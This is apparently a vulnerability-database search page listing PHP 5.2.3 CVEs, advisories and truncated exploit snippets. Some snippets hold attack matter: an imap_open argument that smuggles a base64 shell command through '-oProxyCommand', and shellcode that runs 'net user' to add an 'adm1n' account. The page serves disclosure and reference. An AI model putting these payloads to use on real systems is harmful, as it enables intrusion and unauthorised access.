67 matches found
EUVD-2007-4490
Malware in sbrugna...
PHP 5.2.3 imap (Debian Based) - imap_open Disable Functions Bypass
PHP 5.2.3 imap Debian Based - imapopen Disable Functions Bypass /tmp/test0001 $server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh"; imapopen''.$server.':143/imapINBOX', '', '' or die"\n\nError: ".imaplasterror;...
CVE-2007-4255
Buffer overflow in the mSQL extension in PHP 5.2.3 allows context-dependent attackers to execute arbitrary code via a long first argument to the msql_connect function...
CVE-2007-4507
Multiple buffer overflows in the phpntuser component for PHP 5.2.3 allow context-dependent attackers to cause a denial of service or execute arbitrary code via long arguments to the (1) ntuser_getuserlist, (2) ntuser_getuserinfo, (3) ntuser_getusergroups, or (4) ntuser_getdomaincontroller functions...
CVE-2007-3790
The com_print_typeinfo function in the bz2 extension in PHP 5.2.3 allows context-dependent attackers to cause a denial of service via a long argument...
PHP <= 5.1.6 Chunk_Split() Function Integer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/24261/info PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory...
PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit
No description provided by source. <?php // PHP <= 5.2.3 snmpget() object id local Buffer Overflow (eip overwrite) exploit // bug discovered by rgod // Original advisory: http://retrogod.altervista.org/php446snmpgetlocalbof.html // [quote=rgod]more than 256 chars result in simple eip overwrite[/quote] // right!...
PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit (2)
No description provided by source. <?php PHP win32std Buffer Overflow Exploit. Tested on: PHP 5.2.3, Windows XP SP2...
PHP <= 5.2.3 EXT/Session HTTP Response Header Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/24268/info PHP is prone to an HTTP-response-header-injection vulnerability because it fails to sanitize user-supplied input. An attacker can exploit this issue to inject additional cookie attributes into session cookies...
Fedora Update for php-doctrine-Doctrine FEDORA-2011-4098
Check for the Version of php-doctrine-Doctrine. OpenVAS Vulnerability Test: Fedora Update for php-doctrine-Doctrine FEDORA-2011-4098. Authors: System Generated Check. Copyright: Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net. This program is free software; you can redistribute it...
[SECURITY] Fedora 14 Update: php-doctrine-Doctrine-1.2.4-1.fc14
Doctrine is an object relational mapper (ORM) for PHP 5.2.3+ that sits on top of a powerful database abstraction layer (DBAL). One of its key features is the option to write database queries in a proprietary object oriented SQL dialect called Doctrine Query Language (DQL), inspired by Hibernate's HQL...
[SECURITY] Fedora 15 Update: php-doctrine-Doctrine-1.2.4-1.fc15
Doctrine is an object relational mapper (ORM) for PHP 5.2.3+ that sits on top of a powerful database abstraction layer (DBAL). One of its key features is the option to write database queries in a proprietary object oriented SQL dialect called Doctrine Query Language (DQL), inspired by Hibernate's HQL...
Multiple PHP Functions - Local Denial of Service Vulnerabilities
Exploit for multiple platform in category dos / poc. Multiple PHP Functions - Local Denial of Service Vulnerabilities. cominvoke // http://www.nullbyte.org.il // //...
PHP 5.2.3 Glob Function Denial of Service Vulnerability
No description provided by source...
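Multiple Vulnerabilities in PHP 5.2.4 and Earlier
PHP is a popular web programming language. PHP has multiple security issues that remote attackers can exploit to carry out buffer overflow, denial of service, and security bypass attacks. - dl mishandles file names, which can lead to cross-site scripting attacks. - dl mishandles the size of the MAXPATHLEN parameter, which can lead to denial of service attacks. - htmlentities/htmlspecialchars mishandle some multibyte sequences. - The glibc implementations of the fnmatch, setlocale and glob functions contain buffer overflows. Slackware Linux 10.2 Slackware Linux 10.1 Slackware Linux 12.0 Slackware Linux 11.0...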
CVE-2007-4782
PHP before 5.2.3 allows context-dependent attackers to cause a denial of service (application crash) via (1) a long string in the pattern parameter to the glob function; or (2) a long string in the string parameter to the fnmatch function, accompanied by a pattern parameter value with undefined...
CVE-2007-4661
The chunk_split function in string.c in PHP 5.2.3 does not properly calculate the needed buffer size due to precision loss when performing integer arithmetic with floating point numbers, which has unknown attack vectors and impact, possibly resulting in a heap-based buffer overflow. NOTE: this is...
CVE-2007-4661
CVE-2007-4661 affects PHP 5.2.3: the chunk_split function miscomputes the required buffer size due to precision loss in floating point arithmetic, which can lead to a heap-based buffer overflow. The description notes this stems from an incomplete fix for CVE-2007-2872 and lists the impact as unkn...
php523winbrowse-overflow.txt
"adm1n" password="netjackal" $SC= "\xEB\x19\x5A\x31\xC0\x50\x88\x42\x52\x52\xBB\x6D\x13\x86". "\x7C\xFF\xD3\xBB\xDA\xCD\x81\x7C\x31\xC0\x50\xFF\xD3\xE8". "\xE2\xFF\xFF\xFF\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63". "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6D\x31"...
phpget-overflow.txt
...